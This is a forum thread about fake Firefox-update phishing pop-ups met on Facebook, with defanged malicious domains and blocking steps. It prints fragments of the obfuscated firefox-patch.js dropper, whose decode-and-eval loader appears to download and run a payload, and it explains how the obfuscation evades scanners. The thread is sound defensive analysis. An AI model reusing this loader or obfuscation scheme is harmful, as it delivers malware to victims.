Blocking Malicious Sites

[DaveLembke]

Not sure if there is a better method than what I am about to do, but recently the frequency of phishing attacks to get people to click on fake updates for Firefox have increased and I want to put an end to this potential issue.

Initially the issue was once in a while this pop up would happen. But more recently its been happening more often then before with my daughter and my wifes computers having this pop up when on Facebook so its getting triggered somewhere in Facebook.

All computers are clean, no malware.

Many years ago i use to just add a entry to HOSTS file and have it redirect to 127.0.0.1 and that would kill off navigating to bad sites, but I havent had to do the HOSTS redirect to 127.0.0.1 HOME trick in years and there has to be better methods of killing off phishing.

So the issue thats popping up is this one as I shared a ways back: http://www.computerhope.com/forum/index.php/topic,157201.0.html

Where a pop up that looks like you need to update shows and it tries to trick people into running a malicious script. The path to the script that is malicious is dynamically created and its a one time path. That is right as that system is targeted for phishing attack that path is live, but a second later the dynamic path is dead. I feel the group thats running this malicious phishing attack is doing this to hide what they are up to. This way if you bring the URL path to some authority and say they are up to no good, it cant be proven because the path is dead and its no longer offering download of malicious script from that dynamic URL.

So thats it, I am just going to kill off any and all URLs coming from where ever the host is so that it doesnt matter what dynamic naming convention is used beyond that of the domain name that is being uses for hosting phishing attacks.

We all run Firefox browser and I found this which I am hoping is going to be the solution: https://addons.mozilla.org/en-US/firefox/addon/blocksite/

But this doesnt stop the initially fishing attack from each domain, it would only allow ability to stop future phishing attacks from domains that have already been used to phish from, so I would need myself or family member to stop and contact me and then myself copy/paste the URL to notepad  to add to my black list list. And then add that domain and wild cards to it so that any and all variant pathing is dead.

Is this the best direction to go with this or is there a proactive vs reactive method that I can implement that is free or low cost to stop this phishing nonsense?

Additionally its kind of a shame that the URL path to being able to download and run this script is dead a second after its phishing for you to run it. I'd really like to run it in a sandbox and see what exactly they are targeting. But the systems that this is popping up on are highly configured/customized systems and its not worth it to intentionally infect one of them the next time the opportunity arises. However maybe I could get my wife to use facebook from a VM and when it pops up in the VM contact me in which I would close out her facebook and run the script within the confines of the VM and see what its up to. However I am also tempted to just play it safe and not poke a stick at it and see if it bites and with what venom type. 

The bad domains by the way are:

https: //eekumyoutube . org

and

https: //meihitravelfeeder . org

so far... there may be other domains using this same exact phishing method but I only have these 2 screenshots to see where they are originating from. Also to note that these sites have the GREEN VERIFIED LOCK symbol top left to make it look safe when its likely is far from safe.

[attachment deleted by admin to conserve space]

[BC_Programmer]

I use Firefox as my primary browser and I've never seen any of those things you described there before or since. I've never been prompted for a fake Firefox update, ever, for example.

[DaveLembke]

Do you run Facebook through Firefox? It seems to be the common link between all systems that I have seen this on is that they are on facebook and then this pops up once every 2 or 3 weeks. Thinking its associated with the click here to see what happens next ads that they have as for that is when i saw this happen on my own system with facebook running. There was a picture of a guy standing next to a metal shed and it was something like you wont believe what lies under this mans shed and then it was click bait where the site you go to shows of hidden bunkers and spaces people have on their property and then this updates pops up.

However my wife stated that she didnt click on any click bait on facebook and it popped up. She actually almost clicked to run it and my daughter saw it pop up and yelled NOOOOOOO to my wife not to run that thats BAD!!!    GOOD KID stopping mom from running it 

Additionally this has happened on 2 different networks. My home computers as well as an office computer elsewhere. The computer at that office has never been home and my come computers never there. Also no removable media shared between locations so its not a local infection of any kind of a hijacker etc, its plainly a phishing attack by something that is in common to our facebook accounts.

My daughters computer she was playing a facebook game and it popped up on her system. The frequency of these occurrences use to be once after couple months, but recently its been like once every 2 or 3 weeks.

Too bad there isnt an instant replay method of reversing the chain of events to see if there is more information that can be found such as which ad or which game or whatever is common to this problem on facebook.

These never happen with other websites. Only if facebook is running. 

Update to bad domains:

The bad domains by the way are:

    https: //eekumyoutube . org        tries to get you to run 338kb  firefox-patch.js

    https: //meihitravelfeeder . org       tries to get you to run 6.5kb  firefox-patch.js

    https: //liirawynagrodzenia .net       tries to get you to run 482kb  firefox-patch.js

All of these use the same phishing attack background as seen in the screenshot pics. I added spacing to kill these from acting as links. 

[BC_Programmer]

I pop on Facebook once every few days, yes.

Perhaps it is taking place through Adobe Flash?  I don't have  that installed.

[DaveLembke]

Didnt even think of that.... it could be through Adobe Flash since its enabled on all systems and my daughter was playing the one flash game.

I did some digging online and found a place to report problems to mozilla: https://www.mozilla.org/en-US/about/legal/fraud-report/

I then downloaded a Cature to Text OCR program to get the full URL paths off the screenshots I have. The OCR program isnt perfect, as for I had to verify that the URL path catured with OCR matched the screenshot it gets confused with pipe ( | ) and L ( l ) for example and some other places it gave wrong characters. Still easier than having to type the full URL from scratch from screenshot to notepad, but the OCR is not perfect in ASCII recognition but it was free. http://capture2text.sourceforge.net/

Going to send in the URLs to them even though there is probably very little they can do to fix this.

[DaveLembke]

Wife had another phishing attack today. This time I safely downloaded the .js to check it out without running it.

Thinking its coded up in a language other than english as for some of it stands out as code that is easy to read and other parts of it is just gobleygook to my eyes. I opened it for editing with JetBrains IntelliJ IDEA Community Edition 2016.3.

var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
   var d = new ActiveXObject(sir);
   d.Add("a","3");
   var t=+d.Item("a");
   var rjdmefbshp="";
   var trurghaaq=t;
   var rrooaufpn=lubjgros["sp"+"l"+"i"+"t"]("");
   var am="gth";
   for (a=0;a<rrooaufpn["len"+am];
   a +=trurghaaq){      rjdmefbshp=rjdmefbshp+rrooaufpn[a];}
   var ikvcfnino="";
   if(t==3){ikvcfnino=rrr+"a";}
   if(t==3){ikvcfnino +="l";}
   var iehtbcmcc=this;
   var hkthfwmtez=iehtbcmcc[ikvcfnino];
   var iepizmswd=hkthfwmtez;
   iepizmswd(rjdmefbshp);

I can share the entirety of the TEXT form of this bad firefox-patch.js code here if allowed to do so for someone good with Java to look over. What I am getting from looking at the code is that it looks like they split up and recombine through concatenation SCRIPTING DICTIONARY .... not sure if this is to try to hide keywords from malware detection software etc. Also what stood out is that this appears to use an ActiveX Object to do something, creating it dynamically on the fly from the Java code.

I scanned this .js file with Malwarebytes and it said all is good.
I scanned this .js file with Microsoft Security Essentials and it said all is good.
I scanned this .js file with McAfee which my wife also has installed and it also said no threats detected.

Here is a code snippet from the start of the script and lots of stuff makes no sense to me and thinking its because it might be in a different language than english. The fact that some of it is in english and other parts of the code is unable to be read by me, maybe this script detects what language the firefox browser is and then carries out attacks specific to the language of the browser version.

Code: [Select]

   var params="af8455a4d8e8466b492409049ef1e3c4";
   var odubo='vkzaglrtr hbalxpnh=pv"hfewovswakvlvi"rm;
qhviyaxwrit kdkfbwzsdaqdmmtspbetwqpskw=fa\'nfdnx wdravootvxiakz=sdltjrws"ifmzouemdjqarotuprmeehiadiecimrsusaddbeklsewochbwmpzcxtarpioxk"oktsketw;
ew.pvnvvwxietznwi pxakz=clvljisvtfaelpAatcqdeztjoubqocwkXknOwqSogMfl"wyXiitdi(jaXqi.cu2yqMjsMnxLmyPjeTsiTyt"aoLanHlgnox=ftbtsebp)kj;
adtwicgkAikipswas mhbwzOnnXtwjuyvsieaa"pm(wbtfaSiwegccnothppicikiiiuchgrdvitbFkx.xmlylnnngnutrtsvwylxenieksSaveqvjbibdyczfmdxOjktva;
oh)cjrcbtyt"ryWgk=ceczrSmdylp{notuppmniyx.ywcetrdmpohiafrdntxrSwkcczNcwlloldoaezFnyuvrfnlifu;
gs(zimoveizlrsicfFfoekebti.xwtwxsvbisjsvrElgxyabjs)nx)wy.qw(coccttyheqmljsepnDofeol(dhenjlkpchlFitirvasfcui}butcw)jz;
rs)gsexh(tv{cmcwxhmq(cgrauoqlvqs}aifdl=hbibg zr1ktabfrbi5vu=se<ur;
xe;
zwihy{qp)yy+jqtsciir+jt.mhant{cnoiorsxyoa"fm(jmnkeGurppbert vz,rk"dd"laEuqTeysmwptmtnf:shhustxbdsf+gs"lioiy/ih/lz+zllcxrvt"pgmsiunjaqfpyg+hlrqw/oa"jw"ua+irsqd.otaqqmjr,xm"vzvip vjfpzllueqwsxblyf)ggfxsawpeiosek.cznmo;
nzaphlrwuwlnfgldhdjw(caehhrajbyeatw)hh;
hxaljcit}bztwxkis;
zs)aoelc(dj{qncxkhpqinvrcjcgupdjWdsSrmekflynSgsehxtag.qs0gd0og5xd0zepnl(fcjlu}mj}vp8ue)rf;
ysyqylffXyqGuvvcfJji=nailinkaavq7awAmhplvsahezdocz.eqRgheddTibejfxgsnaxsyrbiluhtsaisettbm.qfgebnrsizj(mytzcrivdnjigp;
go=ze3yp)yhsbzelcRhcpdbaum.vuTstewisereafournghumbsrf.mkbjpxsntqvnxaimtrorglisqgtyh)nu3mz,gh;
js(xt0dabqk9ynfjiwjozigMyvjdwVcjNruLobnbfbmaCsi9bwgxqYbfAsnJwzsob"if=bwJshMrfFzvWwi4nnRoxWfakxhIyhImuJhzWyeEgeNjmcipXxl;
qa"wo';
So for now I am just adding the domains as a wildcard block with Firefox Blocker Addon as seen in 2nd pic

And 3rd pic below shows that its working to block that domain now.... Curious how many different domains they are using this phishing attack through now. I have a notebook with them written down to add this black list to all systems now. As they are detected i will kill them off from repeat attacks using the same domains. 

[attachment deleted by admin to conserve space]

[BC_Programmer]

Come on now, we've been over how Java and Javascript are completely different programming languages, haven't we?

Anyway, the javascript is intentionally obfuscated to make it harder to follow by using randomized names and indirection. That's typical for malicious javascript. It detects as clean because it is probably randomized differently every time it is 'delivered'.

[DaveLembke]

Come on now, we've been over how Java and Javascript are completely different programming languages, haven't we?

  Yes ... I recognized .js as a javascript, but thought it was somehow creating something else spawning other code type from within the javascript in which that might be java instructions when it was making a new ActiveX Object. Java Script has many limitations whereas a different script spawned from it wouldnt have the same limitations i was thinking.

Sadly I never worked with Java and only very limited with Java Script, so when i saw the mess that was contained within, i thought it might be Java Script spawning off another language such as Java which might work more hand in hand with it.

Didnt expect the stuff like this to be just clutter to try to confuse. I figured all the code/instructions would have purpose vs just to be clutter. And this looked like 32 character hex injection with params taking on the hex string:  var params="af8455a4d8e8466b492409049ef1e3c4";

   var params="af8455a4d8e8466b492409049ef1e3c4";
   var odubo='vkzaglrtr hbalxpnh=pv"hfewovswakvlvi"rm;
qhviyaxwrit kdkfbwzsdaqdmmtspbetwqpskw=fa\'nfdnx wdravootvxiakz=sdltjrws"ifmzouemdjqarotuprmeehiadiecimrsusaddbe klsewochbwmpzcxtarpioxk"oktsketw;
ew.pvnvvwxietznwi pxakz=clvljisvtfaelpAatcqdeztjoubqocwkXknOwqSogMfl"wyXiitdi(jaXqi.cu2yqMjsMnxLmyPjeTsiTyt"aoLanHlgnox=ftbtsebp)kj;
adtwicgkAikipswas mhbwzOnnXtwjuyvsieaa"pm(wbtfaSiwegccnothppicikiiiuchgrdvitbFkx. xmlylnnngnutrtsvwylxenieksSaveqvjbibdyc zfmdxOjktva;
oh)cjrcbtyt"ryWgk=ceczrSmdylp{notuppmniyx.ywcetrdmpohiafrdntxrSwkcczNcwlloldoaezFnyuvrfnlifu;
gs(zimoveizlrsicfFfoekebti.xwtwxsvbisjsvrE lgxyabjs)nx)wy.qw(coccttyheqmljsepnDofeol(dhenjlkpchlFitirvasfcui}butcw)jz;
rs)gsexh(tv{cmcwxhmq(cgrauoqlvqs}aifdl=hbibg zr1ktabfrbi5vu=se<ur;
xe;
zwihy{qp)yy+jqtsciir+jt.mhant{cnoiorsxyoa"fm(jmnkeGurppbert vz,rk"dd"laEuqTeysmwptmtnf:shhustxbdsf+gs"lioiy/ih/lz+zllcxrvt"pgmsiunjaqfpyg+hlrqw/oa"jw"ua+irsqd.otaqqmjr,xm"vzvip vjfpzllueqwsxblyf)ggfxsawpeiosek.cznmo;
nzaphlrwuwlnfgldhdjw(caehhrajbyeatw)hh;
hxaljcit}bztwxkis;
zs)aoelc(dj{qncxkhpqinvrcjcgupdjWdsSrmekflynSgsehxtag.qs0gd0og5xd0zepnl(fcjlu}mj}vp8ue)rf;
ysyqylffXyqGuvvcfJji=nailinkaavq7awAmhplvsahezdocz.eqRgheddTibejfxgsnaxsyrbiluhtsaisettbm.qfgebnrsizj(mytzcrivdnjigp;
go=ze3yp)yhsbzelcRhcpdbaum.vuTstewisereafournghu mbsrf.mkbjpxsntqvnxaimtrorglisqgtyh)nu3mz,gh;
js(xt0dabqk9ynfjiwjozigMyvjdwVcjNruLobnbfb maCsi9bwgxqYbfAsnJwzsob"if=bwJshMrfFzvWwi4nnRoxWfakxhIyhImuJhzWyeEgeNjmcipXxl;
qa"wo';

[BC_Programmer]

In the earlier example it's using ActiveXObject() to create a Dictionary (hashMap).

Javascript is probably worse than perl in how badly  you can mangle it. I found this example of a obfuscated Hello World Program, for example:

Code: [Select]

([]+/H/)[1&11>>1]+(+[[]+(1-~1<<1)+(~1+1e1)+(1%11)+(1|1>>1|1)+(~1+1e1)+(.1^!1)])[[([]+!![
11])[11^11]+[[{}]+{}][1/1.1&1][1]]+([[]+111/!1][+!1][([{}]+{})[1e1>>1]+[[],[]+{}][1&11>>
1][1|[]]+([]+[][111])[1&1]+[{},1e1,!1+{}][~~(1.1+1.1)][1^1<<1]+(11/!{}+{})[1-~1<<1]+[!!{
}+[]][+(11>11)][[]+1]+(/^/[1.11]+/&/)[.1^!1]+[{},[{}]+{},1][1&11>>1][1+1e1+1]+([]+!!{})[
.1^!1]+([]+{}+[])[[]+1]+[!!{}+{}][!11+!111][[]+1]]+[])[(!/~/+{})[1|1<<1]+[/=/,[]+[][1]][
1&11>>1][1&1>>1]+([]+{})[~~(1.1+1.1)]+[1,!1+{}][1%11][1^1<<1]+(111/[]+/1/)[~1+1e1+~1]+[!
!/-/+[]][+(11>11)][1]]((1<<1^11)+((+(1<1))==([]+/-/[(!![11]+[])[+!1]+(!!/-/+{})[1-~1]+([
]+!/~/)[1-~1]+(!!/-/+{})[!111+!111]])[11%11]),-~11>>1)](~1-~1e1<<1<<1)+([]+{111:1111}+[]
)[11111.1%11.1*111e11|!11]+({}+/W/)[1+~1e1-(~11*1.1<<1)]+(+[[]+(1|1>>1)+(1|1>>1|1)+(11-1
>>1)+(1e1>>1|1)+(1e1>>1)+(1>>11)+(11>>>1)])[[(!!{}+[])[11>>>11]+[[]+{}][.1^!1][111%11]]+
([11/[]+[]][111%111][([{}]+[{}])[1e1>>1]+[[],[{}]+[{}]][1|1>>1|1][1|[]]+([][11]+[])[[]+1
]+[{},1e1,![1]+/~/][1<<!1<<1][1<<1^1]+(1/!1+{})[11+1>>1]+[!!/-/+{}][+(111>111)][111%11]+
([][11]+/&/)[1&1>>1]+[{},[]+{}+[],1][[]+1][11-~1+11>>1]+([]+!!/-/)[11>>11]+([]+{})[1|1>>
1|1]+[[]+!!{}][1>>>1][1&11]]+[])[(!{}+[])[1^1<<1]+[/=/,[]+[][1]][1<<1>>1][!111+!111]+([]
+{}+[])[1<<1^1>>1]+[1,![11]+[]][1|1>>1][1|1<<1|1]+(11/[]+/1/)[-~11>>1]+[!![111]+{}][+[]]
[1|1>>1]]((1e1-1)+((1&1>>1)==([]+/-/[(!!{}+{})[+(1>1)]+(!!/-/+{})[1|1<<1]+(!1+{})[1|1<<1
|1]+(!!/-/+{})[11.11>>11.11]])[1&1>>1]),1-~1<<1)](~1-~1e1<<1<<1)+(/^!/+[])[1+!![11%111]]

Basically it is very dynamic which means you can build functions in pieces and even slap together strings to create functions or function names to call.

[DaveLembke]

Interesting ... is what you shared a partial of code or all of it... I'd expect to see Hello World split up with the letters scattered in this or ascii character calls to call the letters to be used concatenated etc.

In the wheres waldo approach to looking at this these are only characters that stand out that could be used for Hello World.

([]+/H/)[1&11>>1]+(+[[]+(1-~1<<1)+(~1+1e1)+(1%11)+(1|1>>1|1)+(~1+1e1)+(.1^!1)])[[([]+!![
11])[11^11]+[[{}]+{}][1/1.1&1][1]]+([[]+111/!1][+!1][([{}]+{})[1e1>>1]+[[],[]+{}][1&11>>
1][1|[]]+([]+[][111])[1&1]+[{},1e1,!1+{}][~~(1.1+1.1)][1^1<<1]+(11/!{}+{})[1-~1<<1]+[!!{
}+[]][+(11>11)][[]+1]+(/^/[1.11]+/&/)[.1^!1]+[{},[{}]+{},1][1&11>>1][1+1e1+1]+([]+!!{})[
.1^!1]+([]+{}+[])[[]+1]+[!!{}+{}][!11+!111][[]+1]]+[])[(!/~/+{})[1|1<<1]+[/=/,[]+[][1]][
1&11>>1][1&1>>1]+([]+{})[~~(1.1+1.1)]+[1,!1+{}][1%11][1^1<<1]+(111/[]+/1/)[~1+1e1+~1]+[!
!/-/+[]][+(11>11)][1]]((1<<1^11)+((+(1<1))==([]+/-/[(!![11]+[])[+!1]+(!!/-/+{})[1-~1]+([
]+!/~/)[1-~1]+(!!/-/+{})[!111+!111]])[11%11]),-~11>>1)](~1-~1e1<<1<<1)+([]+{111:1111}+[]
)[11111.1%11.1*111e11|!11]+({}+/W/)[1+~1e1-(~11*1.1<<1)]+(+[[]+(1|1>>1)+(1|1>>1|1)+(11-1
>>1)+(1e1>>1|1)+(1e1>>1)+(1>>11)+(11>>>1)])[[(!!{}+[])[11>>>11]+[[]+{}][.1^!1][111%11]]+
([11/[]+[]][111%111][([{}]+[{}])[1e1>>1]+[[],[{}]+[{}]][1|1>>1|1][1|[]]+([][11]+[])[[]+1
]+[{},1e1,![1]+/~/][1<<!1<<1][1<<1^1]+(1/!1+{})[11+1>>1]+[!!/-/+{}][+(111>111)][111%11]+
([][11]+/&/)[1&1>>1]+[{},[]+{}+[],1][[]+1][11-~1+11>>1]+([]+!!/-/)[11>>11]+([]+{})[1|1>>
1|1]+[[]+!!{}][1>>>1][1&11]]+[])[(!{}+[])[1^1<<1]+[/=/,[]+[][1]][1<<1>>1][!111+!111]+([]
+{}+[])[1<<1^1>>1]+[1,![11]+[]][1|1>>1][1|1<<1|1]+(11/[]+/1/)[-~11>>1]+[!![111]+{}][+[]]
[1|1>>1]]((1e1-1)+((1&1>>1)==([]+/-/[(!!{}+{})[+(1>1)]+(!!/-/+{})[1|1<<1]+(!1+{})[1|1<<1
|1]+(!!/-/+{})[11.11>>11.11]])[1&1>>1]),1-~1<<1)](~1-~1e1<<1<<1)+(/^!/+[])[1+!![11%111]]